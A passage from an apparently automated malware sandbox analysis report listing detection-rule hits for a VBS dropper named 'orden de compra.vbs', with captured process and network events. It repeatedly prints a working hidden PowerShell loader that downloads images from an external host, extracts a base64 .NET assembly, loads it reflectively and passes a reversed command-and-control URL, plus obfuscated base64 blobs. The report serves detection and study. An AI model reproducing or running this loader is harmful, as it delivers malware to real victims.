reBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgT
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.orboy/451.342.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.orboy/451.342.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }", Comm
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgT
                  Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 104.21.84.67, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6164, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\orden de compra.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\orden de compra.vbs", CommandLine|base64offset|contains: u, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\orden de compra.vbs", ProcessId: 6164, ProcessName: wscript.exe
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgT
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 104.21.84.67, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6164, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.orboy/451.342.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.orboy/451.342.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }", Comm
                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.orboy/451.342.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.orboy/451.342.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }", Comm
                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\orden de compra.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\orden de compra.vbs", CommandLine|base64offset|contains: u, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\orden de compra.vbs", ProcessId: 6164, ProcessName: wscript.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgT

                  Data Obfuscation

                  barindex
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.orboy/451.342.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += 